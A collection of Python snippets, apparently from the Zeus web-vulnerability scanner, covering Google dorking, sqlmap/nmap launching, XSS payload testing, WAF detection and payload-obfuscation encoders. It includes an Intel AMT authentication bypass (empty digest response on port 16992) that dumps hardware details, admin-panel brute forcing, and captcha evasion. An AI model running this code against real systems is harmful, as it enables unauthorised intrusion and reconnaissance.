示例#1
0
def __get_auth_headers(target, port=16992, source=None, agent=None, proxy=None):
    if not source or 'WWW-Authenticate' not in source.headers['WWW-Authenticate']:
        logger.info(set_color(
            "header value not established, attempting to get bypass..."
        ))
        source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
            'connection': 'close', 'user-agent': agent
        }, proxies=proxy)
        return source
    # Get digest and nonce and return the new header
    if 'WWW-Authenticate' in source.headers:
        logger.info(set_color(
            "header value established successfully, attempting authentication..."
        ))
        data = re.compile('Digest realm="Digest:(.*)", nonce="(.*)",stale="false",qop="auth"').search(
            source.headers['WWW-Authenticate'])
        digest = data.group(1)
        nonce = data.group(2)
        return 'Digest username="******", ' \
               'realm="Digest:{0}", nonce="{1}", ' \
               'uri="/index.htm", response="", qop=auth, ' \
               'nc=00000001, cnonce="deadbeef"'.format(digest, nonce)
    else:
        logger.info(set_color(
            "nothing found, will skip URL..."
        ))
        return None
示例#2
0
 def set_browser(self):
     """
     set the browser settings
     """
     profile = webdriver.FirefoxProfile()
     try:
         if not self.tor:
             logger.info(set_color(
                 "setting the browser..."
             ))
             profile.set_preference("general.useragent.override", self.agent)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
         elif self.xforward:
             profile = self.__set_x_forward(profile)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
         else:
             logger.info(set_color(
                 "setting the Tor browser emulation..."
             ))
             profile = self.__tor_browser_emulation(profile)
             browser = webdriver.Firefox(profile)
     except (OSError, WebDriverException):
         if not self.tor:
             profile.set_preference("general.useragent.override", self.agent)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy(),
                                         executable_path=whichcraft.which("geckodriver"))
         elif self.xforward:
             profile = self.__set_x_forward(profile)
             browser = webdriver.Firefox(profile, proxy=self.__set_proxy())
         else:
             profile = self.__tor_browser_emulation(profile)
             browser = webdriver.Firefox(profile, executable_path=whichcraft.which("geckodriver"))
     return browser
示例#3
0
def main_intel_amt(url, agent=None, proxy=None):
    proxy = proxy_string_to_dict(proxy) or None
    agent = agent or DEFAULT_USER_AGENT
    logger.info(
        set_color(
            "attempting to connect to '{}' and get hardware info...".format(
                url)))
    try:
        json_data = __get_hardware(url, agent=agent, proxy=proxy)
        if json_data is None:
            logger.error(
                set_color("unable to get any information, skipping...",
                          level=40))
            pass
        else:
            print("-" * 40)
            for key in json_data.keys():
                print("{}:".format(str(key).capitalize()))
                for item in json_data[key]:
                    print(" - {}: {}".format(item.capitalize(),
                                             json_data[key][item]))
            print("-" * 40)
    except Exception as e:
        if "Temporary failure in name resolution" in str(e):
            logger.error(
                set_color("failed to connect on '{}', skipping...".format(url),
                          level=40))
            pass
        else:
            logger.exception(
                set_color(
                    "ran into exception '{}', cannot continue...".format(e)))
            request_issue_creation()
示例#4
0
def detect_plugins(html, headers, **kwargs):
    verbose = kwargs.get("verbose", False)

    try:
        retval = []
        plugin_skip_schema = ("__init__", ".pyc")
        plugin_file_list = [f for f in os.listdir(DETECT_PLUGINS_PATH) if not any(s in f for s in plugin_skip_schema)]
        for plugin in plugin_file_list:
            plugin = plugin[:-3]
            if verbose:
                logger.debug(set_color(
                    "loading script '{}'".format(plugin), level=10
                ))
            plugin_detection = "lib.plugins.{}"
            plugin_detection = plugin_detection.format(plugin)
            plugin_detection = importlib.import_module(plugin_detection)
            if plugin_detection.search(html, headers=headers) is True:
                retval.append((plugin_detection.__product__, plugin_detection.__description__))
        if len(retval) > 0:
            return retval
        return None
    except Exception as e:
        logger.exception(str(e))
        if "Read timed out." or "Connection reset by peer" in str(e):
            logger.warning(set_color(
                "plugin request failed, assuming no plugins and continuing", level=30
            ))
            return None
        else:
            logger.exception(set_color(
                "plugin detection has failed with error {}".format(str(e))
            ))
            request_issue_creation()
示例#5
0
 def __config_search_engine(verbose=False):
     """
     configure the search engine if a one different from google is given
     """
     non_default_msg = "specified to use non-default search engine..."
     se_message = "using '{}' as the search engine..."
     if opt.useDDG:
         if verbose:
             logger.debug(
                 set_color(se_message.format("DuckDuckGo"), level=10))
         logger.info(set_color(non_default_msg))
         se = AUTHORIZED_SEARCH_ENGINES["duckduckgo"]
     elif opt.useAOL:
         logger.warning(
             set_color("AOL will take a little longer due to pop-ups...",
                       level=30))
         if verbose:
             logger.debug(set_color(se_message.format("AOL"), level=10))
         logger.info(set_color(non_default_msg))
         se = AUTHORIZED_SEARCH_ENGINES["aol"]
     elif opt.useBing:
         if verbose:
             logger.debug(set_color(se_message.format("Bing"), level=10))
         logger.info(set_color(non_default_msg))
         se = AUTHORIZED_SEARCH_ENGINES["bing"]
     else:
         if verbose:
             logger.debug(
                 set_color("using default search engine (Google)...",
                           level=10))
         logger.info(set_color("using default search engine...")
                     ) if opt.fileToEnumerate is None else ""
         se = AUTHORIZED_SEARCH_ENGINES["google"]
     return se
示例#6
0
 def __choose_attack(choice, attacks):
     while True:
         if int(choice) in range(len(attacks)):
             return int(choice)
         else:
             logger.warning(
                 set_color("{} is not a valid choice...".format(choice)))
示例#7
0
def check_for_robots(url, ext="/robots.txt", data_sep="-" * 30):
    """
    check if the URL has a robots.txt in it and collect `interesting` information
    out of the page
    """
    url = replace_http(url)
    interesting = set()
    full_url = "{}{}{}".format("http://", url, ext)
    conn = requests.get(full_url)
    data = conn.content
    code = conn.status_code
    if code == 404:
        return False
    for line in data.split("\n"):
        if "Allow" in line:
            interesting.add(line.strip())
    if len(interesting) > 0:
        create_tree(full_url, list(interesting))
    else:
        to_display = prompt(
            "nothing interesting found in robots.txt would you like to display the entire page",
            opts="yN")
        if to_display.lower().startswith("y"):
            print("{}\n{}\n{}".format(data_sep, data, data_sep))
    logger.info(set_color("robots.txt page will be saved into a file..."))
    write_to_log_file(data, ROBOTS_PAGE_PATH, "robots-{}.log".format(url))
示例#8
0
def create_urls(url, payload_list, tamper=None):
    """
    create the tampered URL's, write them to a temporary file and read them from there
    """
    tf = tempfile.NamedTemporaryFile(delete=False)
    tf_name = tf.name
    with tf as tmp:
        for i, payload in enumerate(payload_list):
            if tamper:
                try:
                    if i < 1:
                        payload = __tamper_payload(payload,
                                                   tamper_type=tamper,
                                                   warning=True)
                    else:
                        payload = __tamper_payload(payload,
                                                   tamper_type=tamper,
                                                   warning=False)
                except InvalidTamperProvided:
                    logger.error(
                        set_color(
                            "you provided and invalid tamper script, acceptable tamper scripts are: {}..."
                            .format(" | ".join(list_tamper_scripts()),
                                    level=40)))
                    shutdown()
            loaded_url = "{}{}\n".format(url.strip(), payload.strip())
            tmp.write(loaded_url)
    return tf_name
示例#9
0
def __get_hardware(target, agent=None, proxy=None):
    """
    collect all the hardware information from an exploitable target
    """
    req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
    if not req.status_code == 200:
        return None
    logger.info(set_color("connected successfully getting hardware info..."))
    tree = html.fromstring(req.content)
    raw = tree.xpath('//td[@class="r1"]/text()')
    bios_functions = tree.xpath('//td[@class="r1"]/table//td/text()')
    data = {
        'platform': {
            'model': raw[0],
            'manufacturer': raw[1],
            'version': raw[2],
            'serial': raw[4],
            'system_id': raw[5]
        },
        'baseboard': {
            'manufacturer': raw[6],
            'name': raw[7],
            'version': raw[8],
            'serial': raw[9],
            'tag': raw[10],
            'replaceable': raw[11]
        },
        'bios': {
            'vendor': raw[12],
            'version': raw[13],
            'date': raw[14],
            'functions': bios_functions
        }
    }
    return json.dumps(data)
示例#10
0
    def __run_attacks_main():
        which_log_to_use = {
            "dork": URL_LOG_PATH,
            "spider": SPIDER_LOG_PATH
        }

        options = (opt.useRandomDork, opt.dorkToUse, opt.dorkFileToUse, opt.fileToEnumerate)
        to_use = which_log_to_use["dork"] if any(arg for arg in options) is True else which_log_to_use["spider"]
        try:
            urls_to_use = get_latest_log_file(to_use)
        except TypeError:
            urls_to_use = None

        if urls_to_use is None:
            logger.error(set_color(
                "unable to run attacks appears that no file was created for the retrieved data...", level=40
            ))
            shutdown()
        options = [
            opt.runSqliScan, opt.runPortScan,
            opt.intelCheck, opt.adminPanelFinder,
            opt.runXssScan
        ]
        if any(options):
            with open(urls_to_use) as urls:
                for url in urls.readlines():
                    __run_attacks(
                        url.strip(),
                        sqlmap=opt.runSqliScan, nmap=opt.runPortScan,
                        intel=opt.intelCheck, xss=opt.runXssScan,
                        admin=opt.adminPanelFinder, verbose=opt.runInVerbose,
                        batch=opt.runInBatch, auto_start=opt.autoStartSqlmap
                    )
示例#11
0
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(set_color(
            "base64 tamper scripts may increase the possibility of not finding vulnerabilities "
            "in otherwise vulnerable sites...", level=30
        ))
    return base64.b64encode(payload)
示例#12
0
def tamper(payload, **kwargs):
    warning = kwargs.get("warning", True)

    if warning:
        logger.warning(
            set_color(
                "obfuscating payloads by their entity encoding equivalent may increase the "
                "risk of false positives",
                level=30))

    skip = ";"
    encoding_schema = {
        " ": "&nbsp;",
        "<": "&lt;",
        ">": "&gt;",
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
    }
    retval = ""
    for char in str(payload):
        if char in encoding_schema.iterkeys():
            retval += encoding_schema[char]
        elif char not in encoding_schema.iterkeys() and char != skip:
            retval += char
        else:
            retval += char
    return retval
示例#13
0
 def __create_arguments(sqlmap=False, nmap=False):
     """
     create the sqlmap arguments (a list of tuples) that will be passed to the API
     """
     logger.info(set_color(
         "creating arguments for {}...".format("sqlmap" if sqlmap else "nmap")
     ))
     retval = []
     splitter = {"sqlmap": ",", "nmap": "|"}
     if sqlmap:
         if opt.sqlmapArguments is not None:
             for line in opt.sqlmapArguments.split(splitter["sqlmap"]):
                 to_use = line.strip().split(" ")
                 option = (to_use[0], to_use[1])
                 if to_use[0] in SQLMAP_API_OPTIONS:
                     retval.append(option)
                 else:
                     logger.warning(set_color(
                         "option '{}' is not recognized by sqlmap API, skipping...".format(option[0]),
                         level=30
                     ))
     elif nmap:
         warning_msg = "option {} is not known by the nmap api, skipping..."
         if opt.nmapArguments is not None:
             for line in opt.nmapArguments.split(splitter["nmap"]):
                 try:
                     data = line.index(" ")
                 except Exception:
                     data = None
                     pass
                 if data is not None:
                     argument = line[0:data]
                     if argument in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(argument), level=30
                         ))
                 else:
                     if line in NMAP_API_OPTS:
                         retval.append(line)
                     else:
                         logger.warning(set_color(
                             warning_msg.format(line), level=30
                         ))
     return retval
示例#14
0
def __get_raw_data(target, page, agent=None, proxy=None):
    logger.info(set_color("getting raw information..."))
    return requests.get("http://{0}:16992/{1}.htm".format(target, page),
                        headers={
                            'connection': 'close',
                            'Authorization': __get_auth_headers(target),
                            'user-agent': agent
                        },
                        proxies=proxy)
示例#15
0
def load_headers(url, **kwargs):
    """
    load the HTTP headers
    """
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)

    literal_match = re.compile(r"\\(\X(\d+)?\w+)?", re.I)

    req, _, _, _ = get_page(url, agent=agent, proxy=proxy)
    if len(req.cookies) > 0:
        logger.info(set_color(
            "found a request cookie, saving to file...", level=25
        ))
        try:
            cookie_start = req.cookies.keys()
            cookie_value = req.cookies.values()
            write_to_log_file(
                "{}={}".format(''.join(cookie_start), ''.join(cookie_value)),
                COOKIE_LOG_PATH, COOKIE_FILENAME.format(replace_http(url))
            )
        except Exception:
            write_to_log_file(
                [c for c in req.cookies.itervalues()], COOKIE_LOG_PATH,
                COOKIE_FILENAME.format(replace_http(url))
            )
    retval = {}
    do_not_use = []
    http_headers = req.headers
    for header in http_headers:
        try:
            # check for Unicode in the string, this is just a safety net in case something is missed
            # chances are nothing will be matched
            if literal_match.search(header) is not None:
                retval[header] = unicodedata.normalize(
                    "NFKD", u"{}".format(http_headers[header])
                ).encode("ascii", errors="ignore")
            else:
                # test to see if there are any unicode errors in the string
                retval[header] = unicodedata.normalize(
                    "NFKD", u"{}".format(http_headers[header])
                ).encode("ascii", errors="ignore")
        # just to be safe, we're going to put all the possible Unicode errors into a tuple
        except (UnicodeEncodeError, UnicodeDecodeError, UnicodeError, UnicodeTranslateError, UnicodeWarning):
            # if there are any errors, we're going to append them to a `do_not_use` list
            do_not_use.append(header)
    # clear the dict so we can re-add to it
    retval.clear()
    for head in http_headers:
        # if the header is in the list, we skip it
        if head not in do_not_use:
            retval[head] = http_headers[head]
    # return a dict of safe unicodeless HTTP headers
    return retval
示例#16
0
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "hex tamper scripts may increase the risk of false positives...",
                level=30))
    retval = hex(hash(payload))
    if "-" in str(retval):
        return retval[1:-1]
    else:
        return retval
示例#17
0
 def __extract_stacktrace(file_data):
     logger.info(set_color("extracting traceback from log file..."))
     retval, buff_mode, _buffer = [], False, ""
     with open(file_data, "r+") as log:
         for line in log:
             if "Traceback" in line:
                 buff_mode = True
             if line and len(line) < 5:
                 buff_mode = False
                 retval.append(_buffer)
                 _buffer = ""
             if buff_mode:
                 if len(line) > 400:
                     line = line[:400] + "...\n"
                 _buffer += line
     return "".join(retval)
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "enclosing brackets is meant to be used as an obfuscation "
                "against an already valid vulnerable site...",
                level=30))

    to_enclose = string.digits
    retval = ""
    for char in payload:
        if char in to_enclose:
            char = "['{}']".format(char)
            retval += char
        else:
            retval += char
    return retval
def tamper(payload, warning=True, **kwargs):
    if warning:
        logger.warning(
            set_color(
                "obfuscating the payloads by ordinal equivalents may increase the risk "
                "of false positives...",
                level=30))

    retval = ""
    danger_characters = "%&<>/\\;'\""
    for char in payload:
        if char in danger_characters:
            char = "%{}".format(ord(char) * 10 / 7)
            retval += char
        else:
            retval += char
    return retval
示例#20
0
def tamper(payload, **kwargs):
    warning = kwargs.get("warning", True)
    if warning:
        logger.warning(
            set_color(
                "NULL encoding tamper scripts may increase the possibility of not finding vulnerabilities "
                "in otherwise vulnerable sites...",
                level=30))

    retval = ""
    encoder = "%00"
    for char in payload:
        if char == " ":
            char = encoder
            retval += char
        else:
            retval += char
    return retval
示例#21
0
def load_headers(url, **kwargs):
    """
    load the URL headers
    """
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)

    if proxy is not None:
        proxy = proxy_string_to_dict(proxy)
    if not xforward:
        header_value = {
            HTTP_HEADER.CONNECTION: "close",
            HTTP_HEADER.USER_AGENT: agent
        }
    else:
        ip_list = create_random_ip(), create_random_ip(), create_random_ip()
        header_value = {
            HTTP_HEADER.CONNECTION: "close",
            HTTP_HEADER.USER_AGENT: agent,
            HTTP_HEADER.X_FORWARDED_FOR: "{}, {}, {}".format(
                ip_list[0], ip_list[1], ip_list[2]
            )
        }
    req = requests.get(url, params=header_value, proxies=proxy, timeout=10)
    if len(req.cookies) > 0:
        logger.info(set_color(
            "found a request cookie, saving to file...", level=25
        ))
        try:
            cookie_start = req.cookies.keys()
            cookie_value = req.cookies.values()
            write_to_log_file(
                "{}={}".format(''.join(cookie_start), ''.join(cookie_value)),
                COOKIE_LOG_PATH, COOKIE_FILENAME.format(replace_http(url))
            )
        except Exception:
            write_to_log_file(
                [c for c in req.cookies.itervalues()], COOKIE_LOG_PATH,
                COOKIE_FILENAME.format(replace_http(url))
            )
    return req.headers
示例#22
0
 def __config_headers():
     """
     configure the request headers, this will configure user agents and proxies
     """
     if opt.proxyConfig is not None:
         proxy = opt.proxyConfig
     elif opt.proxyFileRand is not None:
         if opt.runInVerbose:
             logger.debug(set_color(
                 "loading random proxy from '{}'...".format(opt.proxyFileRand), level=10
             ))
         with open(opt.proxyFileRand) as proxies:
             possible = proxies.readlines()
             proxy = random.choice(possible).strip()
     else:
         proxy = None
     if opt.usePersonalAgent is not None:
         agent = opt.usePersonalAgent
     elif opt.useRandomAgent:
         agent = grab_random_agent(verbose=opt.runInVerbose)
     else:
         agent = DEFAULT_USER_AGENT
     return proxy, agent
示例#23
0
def main(url, show=False, verbose=False, **kwargs):
    """
    main method to be called
    """
    do_threading = kwargs.get("do_threading", False)
    proc_num = kwargs.get("proc_num", 3)
    logger.info(set_color("parsing robots.txt..."))
    results = check_for_robots(url)
    if not results:
        logger.warning(
            set_color(
                "seems like this page is blocking access to robots.txt...",
                level=30))
    logger.info(set_color("loading extensions..."))
    extensions = __load_extensions()
    if verbose:
        logger.debug(
            set_color("loaded a total of {} extensions...".format(
                len(extensions)),
                      level=10))
    logger.info(set_color("attempting to bruteforce admin panel..."))
    if do_threading:
        logger.warning(
            set_color("starting parallel processing with {} processes, this "
                      "will depend on your GPU speed...".format(proc_num),
                      level=30))
        tasks = []
        for _ in range(0, proc_num):
            p = multiprocessing.Process(target=check_for_admin_page,
                                        args=(url, extensions),
                                        kwargs={
                                            "show_possibles": show,
                                            "verbose": verbose
                                        })
            p.start()
            tasks.append(p)
        for proc in tasks:
            proc.join()
    else:
        check_for_admin_page(url,
                             extensions,
                             show_possibles=show,
                             verbose=verbose)
示例#24
0
    def __run_attacks_main(**kwargs):
        """
        main method to run the attacks
        """
        log_to_use = kwargs.get("log", None)
        if log_to_use is None:
            options = (opt.dorkToUse, opt.useRandomDork, opt.dorkFileToUse)
            log_to_use = URL_LOG_PATH if any(o for o in options) else SPIDER_LOG_PATH
            try:
                urls_to_use = get_latest_log_file(log_to_use)
            except TypeError:
                urls_to_use = None
        else:
            urls_to_use = log_to_use

        if urls_to_use is None:
            logger.error(set_color(
                "unable to run attacks appears that no file was created for the retrieved data", level=40
            ))
            shutdown()
        options = [
            opt.runSqliScan, opt.runPortScan,
            opt.adminPanelFinder, opt.runXssScan,
            opt.performWhoisLookup, opt.performClickjackingScan,
            opt.pgpLookup
        ]
        if any(options):
            with open(urls_to_use) as urls:
                for i, url in enumerate(urls.readlines(), start=1):
                    current = i
                    if "webcache" in url:
                        logger.warning(set_color(
                            "ran into unexpected webcache URL skipping", level=30
                        ))
                        current -= 1
                    else:
                        if not url.strip() == "http://" or url == "https://":
                            logger.info(set_color(
                                "currently running on '{}' (target #{})".format(
                                    url.strip(), current
                                ), level=25
                            ))
                            logger.info(set_color(
                                "fetching target meta-data"
                            ))
                            identified = main_header_check(
                                url, verbose=opt.runInVerbose, agent=agent_to_use,
                                proxy=proxy_to_use, xforward=opt.forwardedForRandomIP,
                                identify_plugins=opt.identifyPlugin, identify_waf=opt.identifyProtection,
                                show_description=opt.showPluginDescription
                            )
                            if not identified:
                                logger.error(set_color(
                                    "target is refusing to allow meta-data dumping, skipping", level=40
                                ))
                            run_attacks(
                                url.strip(),
                                sqlmap=opt.runSqliScan, nmap=opt.runPortScan, pgp=opt.pgpLookup,
                                xss=opt.runXssScan, whois=opt.performWhoisLookup, admin=opt.adminPanelFinder,
                                clickjacking=opt.performClickjackingScan, github=opt.searchGithub,
                                verbose=opt.runInVerbose, batch=opt.runInBatch,
                                auto_start=opt.autoStartSqlmap, xforward=opt.forwardedForRandomIP,
                                sqlmap_args=opt.sqlmapArguments, nmap_args=opt.nmapArguments,
                                show_all=opt.showAllConnections, do_threading=opt.threadPanels,
                                tamper_script=opt.tamperXssPayloads, timeout=opt.controlTimeout,
                                proxy=proxy_to_use, agent=agent_to_use, conf_file=opt.sqlmapConfigFile,
                                threads=opt.amountOfThreads, force_ssl=opt.forceSSL
                            )
                            print("\n")
                        else:
                            logger.warning(set_color(
                                "malformed URL discovered, skipping", level=30
                            ))
示例#25
0
    opt = ZeusParser.cmd_parser()

    ZeusParser().single_show_args(opt)

    # run the setup on the program
    setup(verbose=opt.runInVerbose)

    if not opt.hideBanner:
        print(BANNER)

    start_up()

    if opt.runInVerbose:
        being_run = find_running_opts(opt)
        logger.debug(set_color(
            "running with options '{}'".format(being_run), level=10
        ))

    logger.info(set_color(
        "log file being saved to '{}'".format(get_latest_log_file(CURRENT_LOG_FILE_PATH))
    ))


    def __run_attacks_main(**kwargs):
        """
        main method to run the attacks
        """
        log_to_use = kwargs.get("log", None)
        if log_to_use is None:
            options = (opt.dorkToUse, opt.useRandomDork, opt.dorkFileToUse)
            log_to_use = URL_LOG_PATH if any(o for o in options) else SPIDER_LOG_PATH
示例#26
0
def main_xss(start_url, verbose=False, proxy=None, agent=None, tamper=None):
    """
    main attack method to be called
    """
    if tamper:
        logger.info(set_color(
            "tampering payloads with '{}'...".format(tamper)))
    find_xss_script(start_url)
    logger.info(set_color("loading payloads..."))
    payloads = __load_payloads()
    if verbose:
        logger.debug(
            set_color("a total of {} payloads loaded...".format(len(payloads)),
                      level=10))
    logger.info(
        set_color(
            "payloads will be written to a temporary file and read from there..."
        ))
    filename = create_urls(start_url, payloads, tamper=tamper)
    logger.info(
        set_color("loaded URL's have been saved to '{}'...".format(filename)))
    logger.info(
        set_color("testing for XSS vulnerabilities on host '{}'...".format(
            start_url)))
    if proxy is not None:
        logger.info(set_color("using proxy '{}'...".format(proxy)))
    success = set()
    with open(filename) as urls:
        for i, url in enumerate(urls.readlines(), start=1):
            url = url.strip()
            result = scan_xss(url, proxy=proxy, agent=agent)
            payload = find_xss_script(url)
            if verbose:
                logger.info(set_color(
                    "trying payload '{}'...".format(payload)))
            if result[0] != "sqli" and result[0] is True:
                success.add(url)
                if verbose:
                    logger.debug(
                        set_color(
                            "payload '{}' appears to be usable...".format(
                                payload),
                            level=10))
            elif result[0] is "sqli":
                if i <= 1:
                    logger.error(
                        set_color(
                            "loaded URL '{}' threw a DBMS error and appears to be injectable, test for SQL injection, "
                            "backend DBMS appears to be '{}'...".format(
                                url, result[1]),
                            level=40))
                else:
                    if verbose:
                        logger.error(
                            set_color("SQL error discovered...", level=40))
            else:
                if verbose:
                    logger.debug(
                        set_color(
                            "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'..."
                            .format(start_url, payload),
                            level=10))
    if len(success) != 0:
        logger.info(set_color("possible XSS scripts to be used:"))
        create_tree(start_url, list(success))
    else:
        logger.error(
            set_color(
                "host '{}' does not appear to be vulnerable to XSS attacks...".
                format(start_url)))
    save = prompt("would you like to keep the URL's saved for further testing",
                  opts="yN")
    if save.lower().startswith("n"):
        os.remove(filename)
示例#27
0
def detect_protection(url, **kwargs):
    verbose = kwargs.get("verbose", False)
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)

    url = "{} {}".format(url.strip(), PROTECTION_CHECK_PAYLOAD)

    if verbose:
        logger.debug(set_color(
            "attempting connection to '{}'...".format(url), level=10
        ))
    try:
        _, status, html, headers = get_page(url, agent=agent, proxy=proxy, xforward=xforward)

        # make sure there are no DBMS errors in the HTML
        for dbms in DBMS_ERRORS:
            for regex in DBMS_ERRORS[dbms]:
                if re.compile(regex).search(html) is not None:
                    logger.warning(set_color(
                        "it appears that the WAF/IDS/IPS check threw a DBMS error and may be vulnerable "
                        "to SQL injection attacks. it appears the backend DBMS is '{}', site will be "
                        "saved for further processing...".format(dbms), level=30
                    ))
                    write_to_log_file(url, SQLI_SITES_FILEPATH, SQLI_FOUND_FILENAME)
                    return None

        retval = []
        file_list = [f for f in os.listdir(DETECT_FIREWALL_PATH) if not any(ex in f for ex in ["__init__", ".pyc"])]
        for item in file_list:
            item = item[:-3]
            if verbose:
                logger.debug(set_color(
                    "loading script '{}'...".format(item), level=10
                ))
            detection_name = "lib.firewall.{}"
            detection_name = detection_name.format(item)
            detection_name = importlib.import_module(detection_name)
            if detection_name.detect(html, headers=headers, status=status) is True:
                retval.append(detection_name.__item__)
        if len(retval) != 0:
            if len(retval) >= 2:
                try:
                    del retval[retval.index("Generic (Unknown)")]
                except (Exception, IndexError):
                    logger.warning(set_color(
                        "multiple firewalls identified ({}), displaying most likely...".format(
                            ", ".join([item.split("(")[0] for item in retval])
                        ), level=30
                    ))
                    del retval[retval.index(retval[1])]
                    if len(retval) >= 2:
                        del retval[retval.index(retval[1])]
            if retval[0] == "Generic (Unknown)":
                logger.warning(set_color(
                    "discovered firewall is unknown to Zeus, saving fingerprint to file. "
                    "if you know the details or the context of the firewall please create "
                    "an issue ({}) with the fingerprint, or a pull request with the script...".format(
                        ISSUE_LINK
                    ), level=30
                ))
                fingerprint = "<!---\nHTTP 1.1\nStatus Code: {}\nHTTP Headers: {}\n--->\n{}".format(
                    status, headers, html
                )
                write_to_log_file(fingerprint, UNKNOWN_FIREWALL_FINGERPRINT_PATH, UNKNOWN_FIREWALL_FILENAME)
            return "".join(retval) if isinstance(retval, list) else retval
        else:
            return None

    except Exception as e:
        if "Read timed out." or "Connection reset by peer" in str(e):
            logger.warning(set_color(
                "detection request failed, assuming no protection and continuing...", level=30
            ))
            return None
        else:
            logger.exception(set_color(
                "Zeus ran into an unexpected error '{}'...".format(e), level=50
            ))
            request_issue_creation()
            return None
示例#28
0
def main_header_check(url, **kwargs):
    """
    main function
    """
    verbose = kwargs.get("verbose", False)
    agent = kwargs.get("agent", None)
    proxy = kwargs.get("proxy", None)
    xforward = kwargs.get("xforward", False)
    identify = kwargs.get("identify", True)

    protection = {"hostname": url}
    definition = {
        "x-xss": ("protection against XSS attacks", "XSS"),
        "strict-transport": ("protection against unencrypted connections (force HTTPS connection)", "HTTPS"),
        "x-frame": ("protection against clickjacking vulnerabilities", "CLICKJACKING"),
        "x-content": ("protection against MIME type attacks", "MIME"),
        "x-csrf": ("protection against Cross-Site Forgery attacks", "CSRF"),
        "x-xsrf": ("protection against Cross-Site Forgery attacks", "CSRF"),
        "public-key": ("protection to reduce success rates of MITM attacks", "MITM"),
        "content-security": ("header protection against multiple attack types", "ALL")
    }

    try:
        if identify:
            logger.info(set_color(
                "checking if target URL is protected by some kind of WAF/IPS/IDS..."
            ))
            identified = detect_protection(url, proxy=proxy, agent=agent, verbose=verbose, xforward=xforward)

            if identified is None:
                logger.info(set_color(
                    "no WAF/IDS/IPS has been identified on target URL...", level=25
                ))
            else:
                logger.warning(set_color(
                    "the target URL WAF/IDS/IPS has been identified as '{}'...".format(identified), level=35
                ))

        if verbose:
            logger.debug(set_color(
                "loading XML data...", level=10
            ))
        comparable_headers = load_xml_data(HEADER_XML_DATA)
        logger.info(set_color(
            "attempting to get request headers for '{}'...".format(url.strip())
        ))
        try:
            found_headers = load_headers(url, proxy=proxy, agent=agent, xforward=xforward)
        except (ConnectionError, Exception) as e:
            if "Read timed out." or "Connection reset by peer" in str(e):
                found_headers = None
            else:
                logger.exception(set_color(
                    "Zeus has hit an unexpected error and cannot continue '{}'...".format(e), level=50
                ))
                request_issue_creation()

        if found_headers is not None:
            if verbose:
                logger.debug(set_color(
                    "fetched {}...".format(found_headers), level=10
                ))
            headers_established = [str(h) for h in compare_headers(found_headers, comparable_headers)]
            for key in definition.iterkeys():
                if any(key in h.lower() for h in headers_established):
                    logger.warning(set_color(
                        "provided target has {}...".format(definition[key][0]), level=30
                    ))
            for key in found_headers.iterkeys():
                protection[key] = found_headers[key]
            logger.info(set_color(
                "writing found headers to log file...", level=25
            ))
            return write_to_log_file(protection, HEADER_RESULT_PATH, HEADERS_FILENAME.format(replace_http(url)))
        else:
            logger.error(set_color(
                "unable to retrieve headers for site '{}'...".format(url.strip()), level=40
            ))
    except KeyboardInterrupt:
        if not pause():
            shutdown()
示例#29
0
def search_multiple_pages(query, link_amount, verbose=False, **kwargs):

    def __config_proxy(proxy_string):
        proxy_type_schema = {
            "http": httplib2.socks.PROXY_TYPE_HTTP,
            "socks4": httplib2.socks.PROXY_TYPE_SOCKS4,
            "socks5": httplib2.socks.PROXY_TYPE_SOCKS5
        }
        proxy_type = get_proxy_type(proxy_string)[0]
        proxy_dict = proxy_string_to_dict(proxy_string)
        proxy_config = httplib2.ProxyInfo(
            proxy_type=proxy_type_schema[proxy_type],
            proxy_host="".join(proxy_dict.keys()),
            proxy_port="".join(proxy_dict.values())
        )
        return proxy_config

    proxy, agent = kwargs.get("proxy", None), kwargs.get("agent", None)

    if proxy is not None:
        if verbose:
            logger.debug(set_color(
                "configuring to use proxy '{}'...".format(proxy), level=10
            ))
        __config_proxy(proxy)

    if agent is not None:
        if verbose:
            logger.debug(set_color(
                "settings user-agent to '{}'...".format(agent), level=10
            ))

    logger.warning(set_color(
        "multiple pages will be searched using Google's API client, searches may be blocked after a certain "
        "amount of time...", level=30
    ))
    results, limit, found, index = set(), link_amount, 0, google_api.search(query, user_agent=agent, safe="on")
    try:
        while limit > 0:
            results.add(next(index))
            limit -= 1
            found += 1
    except Exception as e:
        if "Error 503" in str(e):
            logger.fatal(set_color(
                "Google is blocking the current IP address, dumping already found URL's...", level=50
            ))
            results = results
            pass

    retval = set()
    for url in results:
        if URL_REGEX.match(url) and URL_QUERY_REGEX.match(url):
            if verbose:
                logger.debug(set_color(
                    "found '{}'...".format(url), level=10
                ))
            retval.add(url)

    if len(retval) != 0:
        logger.info(set_color(
            "a total of {} links found out of requested {}...".format(
                len(retval), link_amount
            )
        ))
        write_to_log_file(list(retval), URL_LOG_PATH, "url-log-{}.log")
    else:
        logger.error(set_color(
            "unable to extract URL's from results...", level=40
        ))
示例#30
0
def get_urls(query, url, verbose=False, warning=True, **kwargs):
    """
      Bypass Google captchas and Google API by using selenium-webdriver to gather
      the Google URL. This will open a robot controlled browser window and attempt
      to get a URL from Google that will be used for scraping afterwards.
    """
    proxy, user_agent = kwargs.get("proxy", None), kwargs.get("user_agent", None)
    if verbose:
        logger.debug(set_color(
            "setting up the virtual display to hide the browser...", level=10
        ))
    ff_display = Display(visible=0, size=(800, 600))
    ff_display.start()
    logger.info(set_color(
        "firefox browser display will be hidden while it performs the query..."
    ))
    if warning:
        logger.warning(set_color(
            "your web browser will be automated in order for Zeus to successfully "
            "bypass captchas and API calls. this is done in order to grab the URL "
            "from the search and parse the results. please give selenium time to "
            "finish it's task...", level=30
        ))
    if verbose:
